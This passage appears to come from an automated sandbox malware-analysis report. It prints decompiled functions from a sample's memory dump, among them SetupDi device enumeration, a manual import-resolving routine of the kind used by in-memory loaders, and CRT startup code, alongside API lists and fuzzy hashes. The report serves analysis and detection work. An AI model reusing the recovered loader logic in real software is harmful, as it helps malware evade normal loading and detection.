							_push(_v48);
							E1000CA30(_t116, _t168, _t182, _t213);
							_t193 = _t193 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(7);
						_t194 = _t193 - 0x1c;
						_t183 =  &_v44;
						memcpy(_t194, _t183, 7 << 2);
						_t171 = _t183 + 0xe;
						_push(_v1380);
						_t88 = E10019780(_t116, _t183);
						_t196 = _t194 + 0x38;
						_t214 = _t88;
						if(_t88 != 0) {
							E1000D190(_t116, _t171, _t183,  &_v1092, _v48, _v1372);
							_push(_v48);
							E1000CA30(_t116, _t171, _t183, _t214);
							_t196 = _t196 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(0x16);
						_t197 = _t196 - 0x1c;
						_t184 =  &_v44;
						memcpy(_t197, _t184, 7 << 2);
						_t174 = _t184 + 0xe;
						_push(_v1380);
						_t91 = E10019780(_t116, _t184);
						_t199 = _t197 + 0x38;
						_t215 = _t91;
						if(_t91 != 0) {
							E1000D190(_t116, _t174, _t184,  &_v832, _v48, _v1372);
							_push(_v48);
							E1000CA30(_t116, _t174, _t184, _t215);
							_t199 = _t199 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(0xc);
						_t200 = _t199 - 0x1c;
						_t185 =  &_v44;
						memcpy(_t200, _t185, 7 << 2);
						_t177 = _t185 + 0xe;
						_push(_v1380);
						_t94 = E10019780(_t116, _t185);
						_t202 = _t200 + 0x38;
						_t216 = _t94;
						if(_t94 != 0) {
							E1000D190(_t116, _t177, _t185,  &_v572, _v48, _v1372);
							_push(_v48);
							E1000CA30(_t116, _t177, _t185, _t216);
							_t202 = _t202 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(8);
						_t203 = _t202 - 0x1c;
						_t186 =  &_v44;
						memcpy(_t203, _t186, 7 << 2);
						_t164 = _t186 + 0xe;
						_push(_v1380);
						_t97 = E10019780(_t116, _t186);
						_t189 = _t203 + 0x38;
						_t217 = _t97;
						if(_t97 != 0) {
							E1000D190(_t116, _t164, _t186,  &_v312, _v48, _v1372);
							_push(_v48);
							E1000CA30(_t116, _t164, _t186, _t217);
							_t189 = _t189 + 0x10;
						}
						_v1376 = _v1376 + 1;
						E10003310( &_v1368,  &_v1352, _t217,  &_v1352);
					}
					__imp__SetupDiDestroyDeviceInfoList(_v1380);
				}
				E100031A0(_a4, _t148, __eflags,  &_v1368);
				_t150 = _v1384 | 0x00000001;
				__eflags = _t150;
				_v1384 = _t150;
				_v8 = 0xffffffff;
				E10003280( &_v1368);
				 *[fs:0x0] = _v16;
				return _a4;
			}




















































                                                                                                                                                      0x10019960
                                                                                                                                                      0x10019971
                                                                                                                                                      0x10019978
                                                                                                                                                      0x10019980
                                                                                                                                                      0x10019990
                                                                                                                                                      0x10019995
                                                                                                                                                      0x1001999c
                                                                                                                                                      0x100199a6
                                                                                                                                                      0x100199ad
                                                                                                                                                      0x100199bf
                                                                                                                                                      0x100199c5
                                                                                                                                                      0x100199d2
                                                                                                                                                      0x100199e0
                                                                                                                                                      0x100199e5
                                                                                                                                                      0x100199e8
                                                                                                                                                      0x100199ef
                                                                                                                                                      0x100199f3
                                                                                                                                                      0x100199fa
                                                                                                                                                      0x10019a01
                                                                                                                                                      0x10019a09
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019a1d
                                                                                                                                                      0x10019a2b
                                                                                                                                                      0x10019a2f
                                                                                                                                                      0x10019a30
                                                                                                                                                      0x10019a32
                                                                                                                                                      0x10019a3a
                                                                                                                                                      0x10019a3f
                                                                                                                                                      0x10019a3f
                                                                                                                                                      0x10019a47
                                                                                                                                                      0x10019a48
                                                                                                                                                      0x10019a4d
                                                                                                                                                      0x10019a50
                                                                                                                                                      0x10019a52
                                                                                                                                                      0x10019a66
                                                                                                                                                      0x10019a71
                                                                                                                                                      0x10019a72
                                                                                                                                                      0x10019a77
                                                                                                                                                      0x10019a77
                                                                                                                                                      0x10019a80
                                                                                                                                                      0x10019a84
                                                                                                                                                      0x10019a85
                                                                                                                                                      0x10019a87
                                                                                                                                                      0x10019a8f
                                                                                                                                                      0x10019a94
                                                                                                                                                      0x10019a94
                                                                                                                                                      0x10019a9c
                                                                                                                                                      0x10019a9d
                                                                                                                                                      0x10019aa2
                                                                                                                                                      0x10019aa5
                                                                                                                                                      0x10019aa7
                                                                                                                                                      0x10019abb
                                                                                                                                                      0x10019ac6
                                                                                                                                                      0x10019ac7
                                                                                                                                                      0x10019acc
                                                                                                                                                      0x10019acc
                                                                                                                                                      0x10019ad5
                                                                                                                                                      0x10019ad9
                                                                                                                                                      0x10019ada
                                                                                                                                                      0x10019adc
                                                                                                                                                      0x10019ae4
                                                                                                                                                      0x10019ae9
                                                                                                                                                      0x10019ae9
                                                                                                                                                      0x10019af1
                                                                                                                                                      0x10019af2
                                                                                                                                                      0x10019af7
                                                                                                                                                      0x10019afa
                                                                                                                                                      0x10019afc
                                                                                                                                                      0x10019b10
                                                                                                                                                      0x10019b1b
                                                                                                                                                      0x10019b1c
                                                                                                                                                      0x10019b21
                                                                                                                                                      0x10019b21
                                                                                                                                                      0x10019b2a
                                                                                                                                                      0x10019b2e
                                                                                                                                                      0x10019b2f
                                                                                                                                                      0x10019b31
                                                                                                                                                      0x10019b39
                                                                                                                                                      0x10019b3e
                                                                                                                                                      0x10019b3e
                                                                                                                                                      0x10019b46
                                                                                                                                                      0x10019b47
                                                                                                                                                      0x10019b4c
                                                                                                                                                      0x10019b4f
                                                                                                                                                      0x10019b51
                                                                                                                                                      0x10019b65
                                                                                                                                                      0x10019b70
                                                                                                                                                      0x10019b71
                                                                                                                                                      0x10019b76
                                                                                                                                                      0x10019b76
                                                                                                                                                      0x10019b7f
                                                                                                                                                      0x10019b83
                                                                                                                                                      0x10019b84
                                                                                                                                                      0x10019b86
                                                                                                                                                      0x10019b8e
                                                                                                                                                      0x10019b93
                                                                                                                                                      0x10019b93
                                                                                                                                                      0x10019b9b
                                                                                                                                                      0x10019b9c
                                                                                                                                                      0x10019ba1
                                                                                                                                                      0x10019ba4
                                                                                                                                                      0x10019ba6
                                                                                                                                                      0x10019bba
                                                                                                                                                      0x10019bc5
                                                                                                                                                      0x10019bc6
                                                                                                                                                      0x10019bcb
                                                                                                                                                      0x10019bcb
                                                                                                                                                      0x10019bd7
                                                                                                                                                      0x10019bea
                                                                                                                                                      0x10019bea
                                                                                                                                                      0x10019bfb
                                                                                                                                                      0x10019bfb
                                                                                                                                                      0x10019c0b
                                                                                                                                                      0x10019c16
                                                                                                                                                      0x10019c16
                                                                                                                                                      0x10019c19
                                                                                                                                                      0x10019c1f
                                                                                                                                                      0x10019c2c
                                                                                                                                                      0x10019c37
                                                                                                                                                      0x10019c43

                                                                                                                                                      APIs
                                                                                                                                                      • SetupDiGetClassDevsA.SETUPAPI(00000000,00000000,00000000,00000006), ref: 100199BF
                                                                                                                                                      • _memset.LIBCMT ref: 100199E0
                                                                                                                                                      • SetupDiEnumDeviceInfo.SETUPAPI(000000FF,00000000,0000001C), ref: 10019A01
                                                                                                                                                      • _memset.LIBCMT ref: 10019A1D
                                                                                                                                                        • Part of subcall function 10019780: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 100197AC
                                                                                                                                                        • Part of subcall function 10019780: GetLastError.KERNEL32 ref: 100197B2
                                                                                                                                                        • Part of subcall function 10019780: _memset.LIBCMT ref: 100197DE
                                                                                                                                                        • Part of subcall function 10019780: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019804
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      • SetupDiDestroyDeviceInfoList.SETUPAPI(000000FF), ref: 10019BFB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Setup$Device$_memset$ErrorInfoLastPropertyRegistry$ClassDestroyDevsEnumFreeHeapList___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3323326763-0
                                                                                                                                                      • Opcode ID: 53c7cd514117aaf68dad39138555ea45b1c930409595366208031e98964e654d
                                                                                                                                                      • Instruction ID: 92146aaf36cf8da670849d236f9b8fe300c912f778ed1f5ba4bfc820bf5b102a
                                                                                                                                                      • Opcode Fuzzy Hash: 53c7cd514117aaf68dad39138555ea45b1c930409595366208031e98964e654d
                                                                                                                                                      • Instruction Fuzzy Hash: 7381B676D006089BDB14DBA4DC51FEFB379EB48311F048198F509B7281EB35AA85CFA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001AB60, Relevance: 7.7, APIs: 5, Instructions: 180COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 34%
                                                                                                                                                      			E1001AB60(intOrPtr* _a4) {
				void* _v8;
				intOrPtr* _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				signed int* _v32;
				void* _v36;
				intOrPtr _v40;
				void* __ebp;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				void* _t122;
				void* _t130;
				void _t132;
				void _t137;
				void* _t144;
				void* _t159;
				void* _t194;
				void* _t201;
				void* _t202;
				void* _t203;
				void* _t204;

				_t2 = _a4 + 4; // 0xe90575c0
				_v20 =  *_t2;
				_v16 = 1;
				_v12 =  *_a4 + 0x80;
				if( *((intOrPtr*)(_v12 + 4)) != 0) {
					_v8 = _v20 +  *_v12;
					while(1) {
						_t108 = IsBadReadPtr(_v8, 0x14);
						__eflags = _t108;
						if(_t108 != 0) {
							break;
						}
						_t110 = _v8;
						__eflags =  *(_t110 + 0xc);
						if( *(_t110 + 0xc) == 0) {
							break;
						}
						_t18 = _a4 + 0x34; // 0x118bb84d
						_t23 = _a4 + 0x24; // 0xf3c7e850
						_t113 =  *((intOrPtr*)( *_t23))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *_t18);
						_t204 = _t203 + 8;
						_v36 = _t113;
						__eflags = _v36;
						if(__eflags != 0) {
							_t28 = _a4 + 0xc; // 0x52b8558b
							_push(4 +  *_t28 * 4);
							_t32 = _a4 + 8; // 0x98
							_push( *_t32);
							_t115 = E1000E018(_t144,  *_t32, _t201, _t202, __eflags);
							_t203 = _t204 + 8;
							_v28 = _t115;
							__eflags = _v28;
							if(_v28 != 0) {
								 *(_a4 + 8) = _v28;
								_t45 = _a4 + 0xc; // 0x52b8558b
								_t47 = _a4 + 8; // 0x98
								 *((intOrPtr*)( *_t47 +  *_t45 * 4)) = _v36;
								_t52 = _a4 + 0xc; // 0x52b8558b
								 *(_a4 + 0xc) =  *_t52 + 1;
								__eflags =  *_v8;
								if( *_v8 == 0) {
									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									_t122 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									__eflags = _t122;
									_v24 = _t122;
								} else {
									_v32 = _v20 +  *_v8;
									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
								}
								while(1) {
									__eflags =  *_v32;
									if( *_v32 == 0) {
										break;
									}
									__eflags =  *_v32 & 0x80000000;
									if(( *_v32 & 0x80000000) == 0) {
										_v40 = _v20 +  *_v32;
										_t88 = _a4 + 0x34; // 0x118bb84d
										_t130 = _v40 + 2;
										__eflags = _t130;
										_t92 = _a4 + 0x28; // 0xc483ffff
										_t132 =  *((intOrPtr*)( *_t92))(_v36, _t130,  *_t88);
										_t203 = _t203 + 0xc;
										 *_v24 = _t132;
									} else {
										_t78 = _a4 + 0x34; // 0x118bb84d
										_t82 = _a4 + 0x28; // 0xc483ffff
										_t137 =  *((intOrPtr*)( *_t82))(_v36,  *_v32 & 0x0000ffff,  *_t78);
										_t203 = _t203 + 0xc;
										 *_v24 = _t137;
									}
									__eflags =  *_v24;
									if( *_v24 != 0) {
										_v32 =  &(_v32[1]);
										_t194 = _v24 + 4;
										__eflags = _t194;
										_v24 = _t194;
										continue;
									} else {
										_v16 = 0;
										break;
									}
								}
								__eflags = _v16;
								if(_v16 != 0) {
									_t159 = _v8 + 0x14;
									__eflags = _t159;
									_v8 = _t159;
									continue;
								}
								_t98 = _a4 + 0x34; // 0x118bb84d
								_t101 = _a4 + 0x2c; // 0x75c08504
								 *((intOrPtr*)( *_t101))(_v36,  *_t98);
								SetLastError(0x7f);
								break;
							}
							_t36 = _a4 + 0x34; // 0x118bb84d
							_t39 = _a4 + 0x2c; // 0x75c08504
							 *((intOrPtr*)( *_t39))(_v36,  *_t36);
							SetLastError(0xe);
							_v16 = 0;
							break;
						}
						SetLastError(0x7e);
						_v16 = 0;
						break;
					}
					return _v16;
				}
				return 1;
			}




























                                                                                                                                                      0x1001ab69
                                                                                                                                                      0x1001ab6c
                                                                                                                                                      0x1001ab6f
                                                                                                                                                      0x1001ab80
                                                                                                                                                      0x1001ab8a
                                                                                                                                                      0x1001ab9e
                                                                                                                                                      0x1001abac
                                                                                                                                                      0x1001abb2
                                                                                                                                                      0x1001abb8
                                                                                                                                                      0x1001abba
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001abc0
                                                                                                                                                      0x1001abc3
                                                                                                                                                      0x1001abc7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001abd0
                                                                                                                                                      0x1001abe1
                                                                                                                                                      0x1001abe4
                                                                                                                                                      0x1001abe6
                                                                                                                                                      0x1001abe9
                                                                                                                                                      0x1001abec
                                                                                                                                                      0x1001abf0
                                                                                                                                                      0x1001ac09
                                                                                                                                                      0x1001ac13
                                                                                                                                                      0x1001ac17
                                                                                                                                                      0x1001ac1a
                                                                                                                                                      0x1001ac1b
                                                                                                                                                      0x1001ac20
                                                                                                                                                      0x1001ac23
                                                                                                                                                      0x1001ac26
                                                                                                                                                      0x1001ac2a
                                                                                                                                                      0x1001ac5c
                                                                                                                                                      0x1001ac62
                                                                                                                                                      0x1001ac68
                                                                                                                                                      0x1001ac6e
                                                                                                                                                      0x1001ac74
                                                                                                                                                      0x1001ac7d
                                                                                                                                                      0x1001ac83
                                                                                                                                                      0x1001ac86
                                                                                                                                                      0x1001acaa
                                                                                                                                                      0x1001acb3
                                                                                                                                                      0x1001acb3
                                                                                                                                                      0x1001acb6
                                                                                                                                                      0x1001ac88
                                                                                                                                                      0x1001ac90
                                                                                                                                                      0x1001ac9c
                                                                                                                                                      0x1001ac9c
                                                                                                                                                      0x1001accd
                                                                                                                                                      0x1001acd0
                                                                                                                                                      0x1001acd3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001acda
                                                                                                                                                      0x1001ace0
                                                                                                                                                      0x1001ad12
                                                                                                                                                      0x1001ad18
                                                                                                                                                      0x1001ad1f
                                                                                                                                                      0x1001ad1f
                                                                                                                                                      0x1001ad2a
                                                                                                                                                      0x1001ad2d
                                                                                                                                                      0x1001ad2f
                                                                                                                                                      0x1001ad35
                                                                                                                                                      0x1001ace2
                                                                                                                                                      0x1001ace5
                                                                                                                                                      0x1001acfb
                                                                                                                                                      0x1001acfe
                                                                                                                                                      0x1001ad00
                                                                                                                                                      0x1001ad06
                                                                                                                                                      0x1001ad06
                                                                                                                                                      0x1001ad3a
                                                                                                                                                      0x1001ad3d
                                                                                                                                                      0x1001acc1
                                                                                                                                                      0x1001acc7
                                                                                                                                                      0x1001acc7
                                                                                                                                                      0x1001acca
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ad3f
                                                                                                                                                      0x1001ad3f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ad3f
                                                                                                                                                      0x1001ad3d
                                                                                                                                                      0x1001ad4d
                                                                                                                                                      0x1001ad51
                                                                                                                                                      0x1001aba6
                                                                                                                                                      0x1001aba6
                                                                                                                                                      0x1001aba9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001aba9
                                                                                                                                                      0x1001ad56
                                                                                                                                                      0x1001ad61
                                                                                                                                                      0x1001ad64
                                                                                                                                                      0x1001ad6b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ad6b
                                                                                                                                                      0x1001ac2f
                                                                                                                                                      0x1001ac3a
                                                                                                                                                      0x1001ac3d
                                                                                                                                                      0x1001ac44
                                                                                                                                                      0x1001ac4a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ac4a
                                                                                                                                                      0x1001abf4
                                                                                                                                                      0x1001abfa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001abfa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ad78
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001ABB2
                                                                                                                                                      • SetLastError.KERNEL32(0000007E), ref: 1001ABF4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLastRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4100373531-0
                                                                                                                                                      • Opcode ID: 59b7c28c5a6a2055bc3ad19a487945ad965c1c3e153a6a88f5d4a819af12ce5d
                                                                                                                                                      • Instruction ID: ee799e3b8b260964baacb2eb61f61a8d535858b77694984a1748e2a29b669165
                                                                                                                                                      • Opcode Fuzzy Hash: 59b7c28c5a6a2055bc3ad19a487945ad965c1c3e153a6a88f5d4a819af12ce5d
                                                                                                                                                      • Instruction Fuzzy Hash: ED81A3B4A00209DFDB04CF94D881AAEB7F1FF89355F248158E819AB351D735EA82CF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040699D, Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 97%
                                                                                                                                                      			E0040699D(void* __ecx, void* __edx) {
				void** _v8;
				struct _STARTUPINFOA _v76;
				void* __esi;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int* _t59;
				signed char _t63;
				void** _t67;
				signed int* _t69;
				signed int _t72;
				int* _t73;
				signed int* _t75;
				signed int* _t76;
				void* _t77;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				signed int** _t92;

				_t89 = E00403A89(__ecx, 0x480);
				_pop(_t75);
				if(_t89 == 0) {
					E00403CCB(__edx, _t89);
					_t75 = 0x1b;
				}
				 *0x411d60 = _t89;
				 *0x411e60 = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t89 =  &(_t89[9]);
					_t48 =  &(( *0x411d60)[0x120]);
				}
				GetStartupInfoA( &_v76);
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					do {
						_t76 =  *0x411d60;
						_t50 = _t72 + _t72 * 8;
						_t90 =  &(_t76[_t50]);
						if(_t76[_t50] != 0xffffffff) {
							_t90[1] = _t90[1] | 0x00000080;
							goto L37;
						}
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87);
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							if(_t58 != 2) {
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
					} while (_t72 < 3);
					return SetHandleCount( *0x411e60);
				}
				_t59 = _v76.lpReserved2;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 =  &(_t59[1]);
				_v8 = _t73 + _t88;
				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				if( *0x411e60 >= _t88) {
					L18:
					_t91 = 0;
					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t77 =  *_v8;
						if(_t77 != 0xffffffff) {
							_t63 =  *_t73;
							if((_t63 & 0x00000001) != 0 && ((_t63 & 0x00000008) != 0 || GetFileType(_t77) != 0)) {
								_t67 =  &(0x411d60[_t91 >> 5][(_t91 & 0x0000001f) + (_t91 & 0x0000001f) * 8]);
								 *_t67 =  *_v8;
								_t67[1] =  *_t73;
							}
						}
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 =  &(_t73[0]);
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x411d64;
					while(1) {
						_t69 = E00403A89(_t75, 0x480);
						if(_t69 == 0) {
							break;
						}
						 *0x411e60 =  *0x411e60 + 0x20;
						 *_t92 = _t69;
						_t13 =  &(_t69[0x120]); // 0x480
						_t75 = _t13;
						while(_t69 < _t75) {
							_t69[1] = _t69[1] & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							_t69[2] = _t69[2] & 0x00000000;
							_t69[1] = 0xa;
							_t69 =  &(_t69[9]);
							_t75 =  &(( *_t92)[0x120]);
						}
						_t92 =  &(_t92[1]);
						if( *0x411e60 < _t88) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x411e60;
					goto L18;
				}
			}


























                                                                                                                                                      0x004069b0
                                                                                                                                                      0x004069b2
                                                                                                                                                      0x004069b5
                                                                                                                                                      0x004069b9
                                                                                                                                                      0x004069be
                                                                                                                                                      0x004069be
                                                                                                                                                      0x004069bf
                                                                                                                                                      0x004069c5
                                                                                                                                                      0x004069cf
                                                                                                                                                      0x004069cf
                                                                                                                                                      0x004069d5
                                                                                                                                                      0x004069d9
                                                                                                                                                      0x004069dd
                                                                                                                                                      0x004069e0
                                                                                                                                                      0x004069e4
                                                                                                                                                      0x004069ed
                                                                                                                                                      0x004069f0
                                                                                                                                                      0x004069f0
                                                                                                                                                      0x004069fb
                                                                                                                                                      0x00406a06
                                                                                                                                                      0x00406add
                                                                                                                                                      0x00406add
                                                                                                                                                      0x00406adf
                                                                                                                                                      0x00406adf
                                                                                                                                                      0x00406ae5
                                                                                                                                                      0x00406aec
                                                                                                                                                      0x00406aef
                                                                                                                                                      0x00406b3e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406b3e
                                                                                                                                                      0x00406af3
                                                                                                                                                      0x00406af7
                                                                                                                                                      0x00406b03
                                                                                                                                                      0x00406b05
                                                                                                                                                      0x00406af9
                                                                                                                                                      0x00406afb
                                                                                                                                                      0x00406afb
                                                                                                                                                      0x00406b0f
                                                                                                                                                      0x00406b14
                                                                                                                                                      0x00406b2d
                                                                                                                                                      0x00406b2d
                                                                                                                                                      0x00406b16
                                                                                                                                                      0x00406b17
                                                                                                                                                      0x00406b1f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406b21
                                                                                                                                                      0x00406b26
                                                                                                                                                      0x00406b2b
                                                                                                                                                      0x00406b36
                                                                                                                                                      0x00406b38
                                                                                                                                                      0x00406b38
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406b36
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406b2b
                                                                                                                                                      0x00406b42
                                                                                                                                                      0x00406b42
                                                                                                                                                      0x00406b43
                                                                                                                                                      0x00406b58
                                                                                                                                                      0x00406b58
                                                                                                                                                      0x00406a0c
                                                                                                                                                      0x00406a11
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406a17
                                                                                                                                                      0x00406a19
                                                                                                                                                      0x00406a1f
                                                                                                                                                      0x00406a29
                                                                                                                                                      0x00406a2b
                                                                                                                                                      0x00406a2b
                                                                                                                                                      0x00406a33
                                                                                                                                                      0x00406a8b
                                                                                                                                                      0x00406a8b
                                                                                                                                                      0x00406a8f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406a91
                                                                                                                                                      0x00406a91
                                                                                                                                                      0x00406a94
                                                                                                                                                      0x00406a99
                                                                                                                                                      0x00406a9b
                                                                                                                                                      0x00406a9f
                                                                                                                                                      0x00406ac4
                                                                                                                                                      0x00406acc
                                                                                                                                                      0x00406ad0
                                                                                                                                                      0x00406ad0
                                                                                                                                                      0x00406a9f
                                                                                                                                                      0x00406ad3
                                                                                                                                                      0x00406ad7
                                                                                                                                                      0x00406ad8
                                                                                                                                                      0x00406ad9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406a35
                                                                                                                                                      0x00406a35
                                                                                                                                                      0x00406a3a
                                                                                                                                                      0x00406a3f
                                                                                                                                                      0x00406a47
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406a49
                                                                                                                                                      0x00406a50
                                                                                                                                                      0x00406a52
                                                                                                                                                      0x00406a52
                                                                                                                                                      0x00406a58
                                                                                                                                                      0x00406a5c
                                                                                                                                                      0x00406a60
                                                                                                                                                      0x00406a63
                                                                                                                                                      0x00406a67
                                                                                                                                                      0x00406a6d
                                                                                                                                                      0x00406a70
                                                                                                                                                      0x00406a70
                                                                                                                                                      0x00406a78
                                                                                                                                                      0x00406a81
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406a83
                                                                                                                                                      0x00406a85
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406a85

                                                                                                                                                      APIs
                                                                                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 004069FB
                                                                                                                                                      • GetFileType.KERNEL32 ref: 00406AA6
                                                                                                                                                      • GetStdHandle.KERNEL32(-000000F6), ref: 00406B09
                                                                                                                                                      • GetFileType.KERNEL32(00000000), ref: 00406B17
                                                                                                                                                      • SetHandleCount.KERNEL32 ref: 00406B4E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileHandleType$CountInfoStartup
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1710529072-0
                                                                                                                                                      • Opcode ID: 74009096f38d183468f150023b426213cf9e98497bee2906fb391ec2abd2d0b2
                                                                                                                                                      • Instruction ID: bcaf39db347c1d90c7623712de0f61de606629f51fcdf8990e7f052139674f4e
                                                                                                                                                      • Opcode Fuzzy Hash: 74009096f38d183468f150023b426213cf9e98497bee2906fb391ec2abd2d0b2
                                                                                                                                                      • Instruction Fuzzy Hash: F45106716042258FC720DF68C8846667BF0EB02368F26867ED9A3F72E1D7789815CB59
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00403280, Relevance: 7.6, APIs: 5, Instructions: 62COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00403280(int* _a4, int _a8, int* _a12) {
				intOrPtr _v4;
				int _v188;
